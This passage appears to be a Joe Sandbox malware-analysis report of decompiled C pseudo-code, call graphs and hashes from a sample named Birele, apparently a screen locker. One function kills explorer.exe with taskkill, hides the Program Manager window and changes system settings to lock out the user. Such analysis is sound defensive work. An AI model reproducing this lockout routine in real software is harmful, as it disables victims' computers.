                                                                                                          									_t66 = E004078C0(_t113);
                                                                                                          									__eflags = _t66;
                                                                                                          									if(_t66 == 0) {
                                                                                                          										goto L42;
                                                                                                          									}
                                                                                                          									 *((char*)(_t113 + 0x12a)) =  *((char*)(_t113 + 0x12a)) + 1;
                                                                                                          									_t46 = E004078A0(_t113, _t110);
                                                                                                          									 *((char*)(_t113 + 0x12a)) =  *((char*)(_t113 + 0x12a)) - 1;
                                                                                                          									goto L46;
                                                                                                          								}
                                                                                                          								__eflags = ( *(_t110 + 8) & 0x000000f0) - 0xf020;
                                                                                                          								if(( *(_t110 + 8) & 0x000000f0) != 0xf020) {
                                                                                                          									goto L41;
                                                                                                          								}
                                                                                                          								_t71 = E004078F8(_t113, _t88);
                                                                                                          								__eflags = _t71;
                                                                                                          								if(_t71 == 0) {
                                                                                                          									goto L41;
                                                                                                          								}
                                                                                                          								__eflags = _t113 -  *0x4198a8; // 0x20a0a88
                                                                                                          								if(__eflags == 0) {
                                                                                                          									goto L41;
                                                                                                          								}
                                                                                                          								_t72 =  *0x4198a8; // 0x20a0a88
                                                                                                          								_t11 = _t72 + 0x1c; // 0x103c6
                                                                                                          								PostMessageA( *_t11, 0x112, 0xf020, 0);
                                                                                                          								goto L42;
                                                                                                          							}
                                                                                                          							 *0x418104(E004078A0(_t113, _t110));
                                                                                                          							goto L45;
                                                                                                          						}
                                                                                                          						SetWindowLongA( *(_t113 + 0x1c), 0xffffffeb, 0);
                                                                                                          						_t46 = 0;
                                                                                                          						goto L46;
                                                                                                          					}
                                                                                                          					 *(_t113 + 0x35) =  *(_t113 + 0x35) | 0x00000010;
                                                                                                          					goto L41;
                                                                                                          				}
                                                                                                          				_t124 = _t113 -  *0x4198a8; // 0x20a0a88
                                                                                                          				if(_t124 == 0 || E004078F8(_t113, _t88) != 0) {
                                                                                                          					PostQuitMessage(0);
                                                                                                          					 *0x4198a5 = 1;
                                                                                                          				}
                                                                                                          				goto L41;
                                                                                                          			}

























                                                                                                          0x00407330
                                                                                                          0x00407331
                                                                                                          0x00407333
                                                                                                          0x0040733a
                                                                                                          0x00407343
                                                                                                          0x00407343
                                                                                                          0x00407348
                                                                                                          0x0040734e
                                                                                                          0x00407350
                                                                                                          0x00407356
                                                                                                          0x0040735a
                                                                                                          0x0040735c
                                                                                                          0x0040735c
                                                                                                          0x0040735a
                                                                                                          0x00407361
                                                                                                          0x00407363
                                                                                                          0x0040736d
                                                                                                          0x00407372
                                                                                                          0x0040737a
                                                                                                          0x004073a6
                                                                                                          0x004073aa
                                                                                                          0x004073b5
                                                                                                          0x004073b9
                                                                                                          0x004073ed
                                                                                                          0x004073f1
                                                                                                          0x0040740a
                                                                                                          0x0040740e
                                                                                                          0x00407459
                                                                                                          0x0040745d
                                                                                                          0x0040748f
                                                                                                          0x00407493
                                                                                                          0x004074ad
                                                                                                          0x004074b1
                                                                                                          0x004074e4
                                                                                                          0x004074e8
                                                                                                          0x00407576
                                                                                                          0x0040757a
                                                                                                          0x00407596
                                                                                                          0x00000000
                                                                                                          0x00407599
                                                                                                          0x004074ee
                                                                                                          0x004074f3
                                                                                                          0x004074f6
                                                                                                          0x00407581
                                                                                                          0x00407581
                                                                                                          0x00407581
                                                                                                          0x00407583
                                                                                                          0x00407583
                                                                                                          0x00407584
                                                                                                          0x0040758b
                                                                                                          0x00407593
                                                                                                          0x00407593
                                                                                                          0x00407595
                                                                                                          0x00407595
                                                                                                          0x00000000
                                                                                                          0x00407595
                                                                                                          0x00407509
                                                                                                          0x0040750b
                                                                                                          0x00407516
                                                                                                          0x00407516
                                                                                                          0x00407518
                                                                                                          0x00407519
                                                                                                          0x00000000
                                                                                                          0x0040751b
                                                                                                          0x0040751d
                                                                                                          0x00407525
                                                                                                          0x0040752a
                                                                                                          0x0040752c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040752e
                                                                                                          0x00407534
                                                                                                          0x00407540
                                                                                                          0x00407545
                                                                                                          0x00407547
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00407558
                                                                                                          0x00407569
                                                                                                          0x0040756b
                                                                                                          0x0040756d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040756f
                                                                                                          0x0040756f
                                                                                                          0x00407571
                                                                                                          0x00000000
                                                                                                          0x00407571
                                                                                                          0x00407536
                                                                                                          0x0040753a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040753c
                                                                                                          0x00407519
                                                                                                          0x004074b8
                                                                                                          0x004074bd
                                                                                                          0x004074bf
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x004074d3
                                                                                                          0x00000000
                                                                                                          0x004074d3
                                                                                                          0x004074a3
                                                                                                          0x00000000
                                                                                                          0x004074a3
                                                                                                          0x00407461
                                                                                                          0x00407466
                                                                                                          0x00407468
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040746e
                                                                                                          0x00407478
                                                                                                          0x0040747d
                                                                                                          0x00000000
                                                                                                          0x0040747d
                                                                                                          0x00407415
                                                                                                          0x00407419
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00407421
                                                                                                          0x00407426
                                                                                                          0x00407428
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040742e
                                                                                                          0x00407434
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00407446
                                                                                                          0x0040744c
                                                                                                          0x0040744f
                                                                                                          0x00000000
                                                                                                          0x0040744f
                                                                                                          0x004073ff
                                                                                                          0x00000000
                                                                                                          0x004073ff
                                                                                                          0x004073c2
                                                                                                          0x004073c7
                                                                                                          0x00000000
                                                                                                          0x004073c7
                                                                                                          0x004073ac
                                                                                                          0x00000000
                                                                                                          0x004073ac
                                                                                                          0x0040737c
                                                                                                          0x00407382
                                                                                                          0x00407395
                                                                                                          0x0040739a
                                                                                                          0x0040739a
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00407395
                                                                                                          • SetWindowLongA.USER32(?,000000EB,00000000), ref: 004073C2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongMessagePostQuitWindow
                                                                                                          • String ID: 8a@$D\@
                                                                                                          • API String ID: 2279192769-2779446848
                                                                                                          • Opcode ID: e8f9b52dbe87dbd2a03ac0c41f9de3099c748b6ecdaf35970de2d348b1ea4bef
                                                                                                          • Instruction ID: 4b44cfad1e402995f628ba2f6b58cd16b1fa440a91150112cc6024f5e216e72f
                                                                                                          • Opcode Fuzzy Hash: e8f9b52dbe87dbd2a03ac0c41f9de3099c748b6ecdaf35970de2d348b1ea4bef
                                                                                                          • Instruction Fuzzy Hash: 9B519030F18A01BBEA2167299C41EEA7792EB04714F50C53BE841B6AD2C77CBC52D65F
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 97 408410-408415 98 408421-408424 97->98 99 408417-40841f call 4083e0 97->99 101 408426-40842c 98->101 102 40844b-4084b4 LoadCursorA call 4086a4 call 405f88 call 405be0 call 407aa8 98->102 99->98 107 408449-40844a 99->107 104 408442 call 406250 101->104 105 40842e-408440 call 406250 call 4076a4 101->105 121 4084b6 102->121 122 4084b8-4084c5 102->122 113 408447 104->113 105->113 113->107 121->122 123 4084c7 122->123 124 4084c9-4084d4 122->124 123->124 125 4084d6-4084da 124->125 126 4084df-4084f8 124->126 125->126 127 4084dc-4084de 125->127 128 4084fa-408516 GetClassInfoA 126->128 129 40851e-408522 126->129 127->126 128->129 130 408524-408528 129->130 131 40852b-408531 129->131 130->131 132 408533-408539 131->132 133 40853f-40855a GetClassInfoA 131->133 132->133 134 4085f8-4085fc 132->134 135 40855c-40857b RegisterClassA 133->135 136 40857d-40858d CreateWindowExA 133->136 135->134 135->136 136->134 137 40858f-4085ad SendMessageA GetWindowLongA 136->137 138 4085be-4085c2 137->138 139 4085af-4085b9 SetWindowLongA 137->139 140 4085c4-4085d4 call 40784c call 40802c 138->140 141 4085d9-4085f6 call 406250 138->141 139->138 140->141 141->134
                                                                                                          C-Code - Quality: 80%
                                                                                                          			E00408410(void* __eax) {
                                                                                                          				void* _t13;
                                                                                                          				void* _t14;
                                                                                                          				void* _t21;
                                                                                                          
                                                                                                          				_t21 = __eax;
                                                                                                          				asm("jecxz 0xc");
                                                                                                          				_t13 = E004083E0( *((intOrPtr*)(__eax + 0x30)));
                                                                                                          				if(_t13 != 0) {
                                                                                                          					asm("jecxz 0x27");
                                                                                                          					_t14 = _t21;
                                                                                                          					if(( *(_t21 + 0x37) & 0x00000001) == 0) {
                                                                                                          						E00406250(_t14);
                                                                                                          					} else {
                                                                                                          						E00406250(_t14);
                                                                                                          						E004076A4(_t21, 1);
                                                                                                          						 *(_t21 + 0x37) =  *(_t21 + 0x37) & 0x000000fe;
                                                                                                          					}
                                                                                                          					return 1;
                                                                                                          				}
                                                                                                          				return _t13;
                                                                                                          			}






                                                                                                          0x00408411
                                                                                                          0x00408415
                                                                                                          0x00408418
                                                                                                          0x0040841f
                                                                                                          0x00408424
                                                                                                          0x00408426
                                                                                                          0x0040842c
                                                                                                          0x00408442
                                                                                                          0x0040842e
                                                                                                          0x0040842e
                                                                                                          0x00408437
                                                                                                          0x0040843c
                                                                                                          0x0040843c
                                                                                                          0x00000000
                                                                                                          0x00408447
                                                                                                          0x0040844a

                                                                                                          APIs
                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00408457
                                                                                                          • GetClassInfoA.USER32(?,?,?), ref: 00408506
                                                                                                          • GetClassInfoA.USER32(?,00000000), ref: 00408550
                                                                                                          • RegisterClassA.USER32(?), ref: 00408574
                                                                                                          • CreateWindowExA.USER32 ref: 00408583
                                                                                                          • SendMessageA.USER32(00000000,00000128,00010002,00000000), ref: 004085A0
                                                                                                          • GetWindowLongA.USER32(00000000,000000EB), ref: 004085A5
                                                                                                          • SetWindowLongA.USER32(00000000,000000EB), ref: 004085B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassWindow$InfoLong$CreateCursorLoadMessageRegisterSend
                                                                                                          • String ID: $@$t}@
                                                                                                          • API String ID: 3716724952-117065541
                                                                                                          • Opcode ID: 33e1cbfca6e6dcfb5ca1865eda7601a10f2527a83db747812a22389b4c7cf9f2
                                                                                                          • Instruction ID: 9368d8d94cc0d850d94797ff8fce3b87ae9df95c5df590054d80d2d2ded8e029
                                                                                                          • Opcode Fuzzy Hash: 33e1cbfca6e6dcfb5ca1865eda7601a10f2527a83db747812a22389b4c7cf9f2
                                                                                                          • Instruction Fuzzy Hash: 3D5192702042016BDB14AF69CD86F6B3698EB44318F04457EFD85EA2D7DF79EC018B29
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 334 401978-40199a RtlInitializeCriticalSection 335 4019a6-4019dc call 40133c * 3 LocalAlloc 334->335 336 40199c-4019a1 RtlEnterCriticalSection 334->336 343 401a0d-401a21 335->343 344 4019de 335->344 336->335 348 401a23-401a28 RtlLeaveCriticalSection 343->348 349 401a2d 343->349 345 4019e3-4019f5 344->345 345->345 347 4019f7-401a06 345->347 347->343 348->349
                                                                                                          C-Code - Quality: 68%
                                                                                                          			E00401978() {
                                                                                                          				void* _t11;
                                                                                                          				signed int _t13;
                                                                                                          				intOrPtr _t19;
                                                                                                          				void* _t20;
                                                                                                          				intOrPtr _t23;
                                                                                                          
                                                                                                          				_push(_t23);
                                                                                                          				_push(E00401A2E);
                                                                                                          				_push( *[fs:edx]);
                                                                                                          				 *[fs:edx] = _t23;
                                                                                                          				_push(0x4195c4);
                                                                                                          				L004012CC();
                                                                                                          				if( *0x419045 != 0) {
                                                                                                          					_push(0x4195c4);
                                                                                                          					L004012D4();
                                                                                                          				}
                                                                                                          				E0040133C(0x4195e4);
                                                                                                          				E0040133C(0x4195f4);
                                                                                                          				E0040133C(0x419620);
                                                                                                          				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                          				 *0x41961c = _t11;
                                                                                                          				if( *0x41961c != 0) {
                                                                                                          					_t13 = 3;
                                                                                                          					do {
                                                                                                          						_t20 =  *0x41961c; // 0x611428
                                                                                                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                          						_t13 = _t13 + 1;
                                                                                                          					} while (_t13 != 0x401);
                                                                                                          					 *((intOrPtr*)(0x419608)) = 0x419604;
                                                                                                          					 *0x419604 = 0x419604;
                                                                                                          					 *0x419610 = 0x419604;
                                                                                                          					 *0x4195bc = 1;
                                                                                                          				}
                                                                                                          				_pop(_t19);
                                                                                                          				 *[fs:eax] = _t19;
                                                                                                          				_push(E00401A35);
                                                                                                          				if( *0x419045 != 0) {
                                                                                                          					_push(0x4195c4);
                                                                                                          					L004012DC();
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          				return 0;
                                                                                                          			}








                                                                                                          0x0040197d
                                                                                                          0x0040197e
                                                                                                          0x00401983
                                                                                                          0x00401986
                                                                                                          0x00401989
                                                                                                          0x0040198e
                                                                                                          0x0040199a
                                                                                                          0x0040199c
                                                                                                          0x004019a1
                                                                                                          0x004019a1
                                                                                                          0x004019ab
                                                                                                          0x004019b5
                                                                                                          0x004019bf
                                                                                                          0x004019cb
                                                                                                          0x004019d0
                                                                                                          0x004019dc
                                                                                                          0x004019de
                                                                                                          0x004019e3
                                                                                                          0x004019e3
                                                                                                          0x004019eb
                                                                                                          0x004019ef
                                                                                                          0x004019f0
                                                                                                          0x004019fc
                                                                                                          0x004019ff
                                                                                                          0x00401a01
                                                                                                          0x00401a06
                                                                                                          0x00401a06
                                                                                                          0x00401a0f
                                                                                                          0x00401a12
                                                                                                          0x00401a15
                                                                                                          0x00401a21
                                                                                                          0x00401a23
                                                                                                          0x00401a28
                                                                                                          0x00000000
                                                                                                          0x00401a28
                                                                                                          0x00401a2d

                                                                                                          APIs
                                                                                                          • RtlInitializeCriticalSection.NTDLL(004195C4), ref: 0040198E
                                                                                                          • RtlEnterCriticalSection.NTDLL(004195C4), ref: 004019A1
                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401A2E), ref: 004019CB
                                                                                                          • RtlLeaveCriticalSection.NTDLL(004195C4), ref: 00401A28
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                          • String ID: <*a$L*a$\*a
                                                                                                          • API String ID: 730355536-3108640670
                                                                                                          • Opcode ID: 72bcf1658e0dbe427098996c7a5a3787cfcb7b4ae65ee31cc13865eff46c6b24
                                                                                                          • Instruction ID: d60cc9ef39ec4d425318bd1b2011f8c13954cbab7dd47cd24b1532178e821ca6
                                                                                                          • Opcode Fuzzy Hash: 72bcf1658e0dbe427098996c7a5a3787cfcb7b4ae65ee31cc13865eff46c6b24
                                                                                                          • Instruction Fuzzy Hash: 71016DB4A042416EE716AF6AD826B997AD5D749B04F04C07FE000B66F2C6BD4C81CB6D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 350 416f28-416f36 FindWindowA 351 416f44-416f52 FindWindowA 350->351 352 416f38-416f3f PostMessageA 350->352 354 416f60-416f6e FindWindowA 351->354 355 416f54-416f5b PostMessageA 351->355 352->351 357 416f70-416f77 PostMessageA 354->357 358 416f7c-416f8a FindWindowA 354->358 355->354 357->358 361 416f98 358->361 362 416f8c-416f93 PostMessageA 358->362 362->361
                                                                                                          APIs
                                                                                                          • FindWindowA.USER32(00000000,00416F9C), ref: 00416F2F
                                                                                                          • PostMessageA.USER32 ref: 00416F3F
                                                                                                          • FindWindowA.USER32(00000000,00416FB4), ref: 00416F4B
                                                                                                          • PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F5B
                                                                                                          • FindWindowA.USER32 ref: 00416F67
                                                                                                          • PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F77
                                                                                                          • FindWindowA.USER32(00000000,00416FD8), ref: 00416F83
                                                                                                          • PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F93
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2578315405-0
                                                                                                          • Opcode ID: 0bb68e452afd02f952d073098c530cdf86de51be71a44cf78ace5e8528899316
                                                                                                          • Instruction ID: 661fba5b01d46d0b46c1ef70e0b7278d8788cecdbc256bcfcd4e32d11ee09805
                                                                                                          • Opcode Fuzzy Hash: 0bb68e452afd02f952d073098c530cdf86de51be71a44cf78ace5e8528899316
                                                                                                          • Instruction Fuzzy Hash: 14F09234BC8B1434F82036721E43F9B18288B04F09F6204267B14BD1C3C5EDF881141D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 64%
                                                                                                          			E00416E5C(void* __eax, void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                                                                          				char _v8;
                                                                                                          				struct HWND__* _t14;
                                                                                                          				void* _t27;
                                                                                                          				intOrPtr _t34;
                                                                                                          				intOrPtr _t38;
                                                                                                          				void* _t39;
                                                                                                          
                                                                                                          				_t39 = __eflags;
                                                                                                          				_push(0);
                                                                                                          				_t27 = __eax;
                                                                                                          				_push(_t38);
                                                                                                          				_push(0x416eed);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t38;
                                                                                                          				WinExec("taskkill /F /IM explorer.exe", 0); // executed
                                                                                                          				E00416BE8(_t27, __esi, _t39); // executed
                                                                                                          				E00416CD4(_t27, __esi, _t39); // executed
                                                                                                          				E00416AF0(1, _t39); // executed
                                                                                                          				SystemParametersInfoA(0x61, 1, 0, 0);
                                                                                                          				_t14 = FindWindowA(0, "Program Manager"); // executed
                                                                                                          				ShowWindow(_t14, 0); // executed
                                                                                                          				E00402800();
                                                                                                          				E004086D8( *((intOrPtr*)(_t27 + 0x48)),  &_v8, E00402910(5));
                                                                                                          				E0040766C( *((intOrPtr*)(_t27 + 0x2c)), _v8);
                                                                                                          				_pop(_t34);
                                                                                                          				 *[fs:eax] = _t34;
                                                                                                          				_push(E00416EF4);
                                                                                                          				return E004039AC( &_v8);
                                                                                                          			}









                                                                                                          0x00416e5c
                                                                                                          0x00416e5f
                                                                                                          0x00416e62
                                                                                                          0x00416e66
                                                                                                          0x00416e67
                                                                                                          0x00416e6c
                                                                                                          0x00416e6f
                                                                                                          0x00416e79
                                                                                                          0x00416e7e
                                                                                                          0x00416e83
                                                                                                          0x00416e8a
                                                                                                          0x00416e97
                                                                                                          0x00416ea5
                                                                                                          0x00416eab
                                                                                                          0x00416eb0
                                                                                                          0x00416ec7
                                                                                                          0x00416ed2
                                                                                                          0x00416ed9
                                                                                                          0x00416edc
                                                                                                          0x00416edf
                                                                                                          0x00416eec

                                                                                                          APIs
                                                                                                          • WinExec.KERNEL32(taskkill /F /IM explorer.exe,00000000), ref: 00416E79
                                                                                                          • SystemParametersInfoA.USER32(00000061,00000001,00000000,00000000), ref: 00416E97
                                                                                                          • FindWindowA.USER32(00000000,Program Manager), ref: 00416EA5
                                                                                                          • ShowWindow.USER32(00000000,00000000,00000000,00416EED,?,?,00000000), ref: 00416EAB
                                                                                                            • Part of subcall function 00402800: QueryPerformanceCounter.KERNEL32 ref: 00402804
                                                                                                            • Part of subcall function 0040766C: SendMessageA.USER32(?,0000000C,00000000,?), ref: 00407689
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CounterExecFindInfoMessageParametersPerformanceQuerySendShowSystem
                                                                                                          • String ID: Program Manager$taskkill /F /IM explorer.exe
                                                                                                          • API String ID: 964502904-1499361905
                                                                                                          • Opcode ID: 81489114cb99e6e32064cc5370d78c1e428efce3f18f5a635dc6c56d2a61b542
                                                                                                          • Instruction ID: 384b94e21422124d9d16ca04a17792f24598e8d7322fdf9879bd3e4b08f62891
                                                                                                          • Opcode Fuzzy Hash: 81489114cb99e6e32064cc5370d78c1e428efce3f18f5a635dc6c56d2a61b542
                                                                                                          • Instruction Fuzzy Hash: 9E018F347847046BD610BBA6CC43F9A76A8DB44B08F62047AB500BA1C2D9BDA940896E
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 385 406520-40655c call 403a44 388 406662-40666e 385->388 389 406562-40656a 385->389 390 406670-406672 388->390 391 406674-40668e call 4079f0 388->391 392 40656c-406570 389->392 393 40657f-406597 call 4083e0 call 407fd0 call 406dfc 389->393 390->391 395 4066c1-4066c9 390->395 406 406690-40669d call 4079fc 391->406 407 40669f-4066af call 4079f0 391->407 392->393 397 406572-40657a call 403c50 392->397 422 40659c-4065a2 393->422 399 4066d3-4066ed call 407a18 395->399 400 4066cb-4066cd 395->400 397->393 416 4066fe-40670e call 407a18 399->416 417 4066ef-4066fc call 407a24 399->417 400->399 404 4066cf-4066d1 400->404 404->399 409 406720-406722 404->409 406->407 407->395 420 4066b1-4066bf call 4079fc 407->420 413 406724 409->413 414 40672c-406741 call 4039ac 409->414 413->414 416->409 433 406710-40671e call 407a24 416->433 417->416 420->395 422->388 427 4065a8-4065af 422->427 427->388 432 4065b5-4065cb call 4077ec 427->432 438 4065d7 432->438 439 4065cd-4065cf 432->439 433->409 440 4065db-4065dd 438->440 439->440 441 4065d1-4065d5 439->441 442 4065e2-4065e4 440->442 441->440 443 4065e6-4065ed 442->443 444 4065ef-4065f3 442->444 443->444 445 4065df 443->445 446 4065f5-406614 call 407d04 call 406b4c call 407fd0 call 406e28 SelectObject 444->446 447 406616-406646 call 403c48 call 403e38 call 406e28 DrawTextA 444->447 445->442 446->447 460 406648-406654 call 407fd0 SelectObject 447->460 461 406659-40665f 447->461 460->461 461->388
                                                                                                          C-Code - Quality: 69%
                                                                                                          			E00406520(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				int _v16;
                                                                                                          				char _v20;
                                                                                                          				char _v28;
                                                                                                          				void* _v32;
                                                                                                          				signed int _v36;
                                                                                                          				struct tagRECT _v52;
                                                                                                          				void* _t62;
                                                                                                          				void* _t66;
                                                                                                          				void* _t68;
                                                                                                          				intOrPtr _t69;
                                                                                                          				void* _t73;
                                                                                                          				void* _t85;
                                                                                                          				intOrPtr _t92;
                                                                                                          				void* _t97;
                                                                                                          				void* _t102;
                                                                                                          				int _t106;
                                                                                                          				CHAR* _t108;
                                                                                                          				void* _t120;
                                                                                                          				intOrPtr _t129;
                                                                                                          				void* _t130;
                                                                                                          				intOrPtr _t131;
                                                                                                          				void* _t132;
                                                                                                          				void* _t133;
                                                                                                          				intOrPtr _t144;
                                                                                                          				intOrPtr _t149;
                                                                                                          				intOrPtr _t151;
                                                                                                          				intOrPtr _t152;
                                                                                                          				void* _t155;
                                                                                                          
                                                                                                          				_t133 = __ecx;
                                                                                                          				_v32 = 0;
                                                                                                          				_t149 = __eax;
                                                                                                          				_push(_t155);
                                                                                                          				_push(0x406742);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t155 + 0xffffffd0;
                                                                                                          				_t129 = __eax;
                                                                                                          				_t138 =  *((intOrPtr*)(__eax + 0xe2));
                                                                                                          				E00403A44( &_v32,  *((intOrPtr*)(__eax + 0xe2)));
                                                                                                          				_v20 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				if(_v32 == 0) {
                                                                                                          					L19:
                                                                                                          					_t130 = 0;
                                                                                                          					_t151 = _t149;
                                                                                                          					_t62 =  *((intOrPtr*)(_t151 + 0x13a)) - 2;
                                                                                                          					if(_t62 < 0 || _t62 == 1) {
                                                                                                          						_v8 = 0;
                                                                                                          						_t66 = E004079F0(_t138);
                                                                                                          						_t140 = _v20 + _v8;
                                                                                                          						if(_t66 != _v20 + _v8) {
                                                                                                          							_t140 = _v20 + _v8;
                                                                                                          							E004079FC(_v20 + _v8);
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          						_t68 = E004079F0(_t140);
                                                                                                          						_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                          						if(_t68 <  *((short*)(_t151 + 0xd8))) {
                                                                                                          							_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                          							E004079FC( *((short*)(_t151 + 0xd8)));
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t69 =  *((intOrPtr*)(_t151 + 0x13a));
                                                                                                          					if(_t69 == 0) {
                                                                                                          						L28:
                                                                                                          						_v12 = 0;
                                                                                                          						_t73 = E00407A18(_t138);
                                                                                                          						_t142 = _v16 + _v12;
                                                                                                          						if(_t73 != _v16 + _v12) {
                                                                                                          							_t142 = _v16 + _v12;
                                                                                                          							E00407A24(_v16 + _v12);
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          						if(E00407A18(_t142) <  *((short*)(_t151 + 0xdc))) {
                                                                                                          							E00407A24( *((short*)(_t151 + 0xdc)));
                                                                                                          							_t130 = 1;
                                                                                                          						}
                                                                                                          						goto L32;
                                                                                                          					} else {
                                                                                                          						_t85 = _t69 - 2;
                                                                                                          						if(_t85 == 0 || _t85 == 2) {
                                                                                                          							goto L28;
                                                                                                          						} else {
                                                                                                          							L32:
                                                                                                          							if(_t130 != 0) {
                                                                                                          								 *0x418104();
                                                                                                          							}
                                                                                                          							_pop(_t144);
                                                                                                          							 *[fs:eax] = _t144;
                                                                                                          							_push(E00406749);
                                                                                                          							return E004039AC( &_v32);
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t92 =  *((intOrPtr*)(_t129 + 0xa8));
                                                                                                          				if(_t92 != 0 &&  *((char*)(_t92 + 0x45)) != 0) {
                                                                                                          					_t138 = 0x406758;
                                                                                                          					E00403C50( &_v32, 0x406758);
                                                                                                          				}
                                                                                                          				E004083E0(_t129);
                                                                                                          				_t97 = E00407FD0(_t129, _t133, _t138);
                                                                                                          				_t136 =  &_v20;
                                                                                                          				_t138 = _v32;
                                                                                                          				E00406DFC(_t97,  &_v20, _v32,  &_v28); // executed
                                                                                                          				_t131 = _t149;
                                                                                                          				if(( *(_t131 + 0x34) & 0x00000001) != 0 &&  *((char*)(_t131 + 0x13a)) != 5) {
                                                                                                          					_t138 =  &_v52;
                                                                                                          					E004077EC(_t131,  &_v52);
                                                                                                          					_v36 = 0x450;
                                                                                                          					_t102 =  *((intOrPtr*)(_t131 + 0x3a)) - 1;
                                                                                                          					if(_t102 == 0) {
                                                                                                          						_t22 =  &_v36;
                                                                                                          						 *_t22 = _v36 | 0x00000002;
                                                                                                          						__eflags =  *_t22;
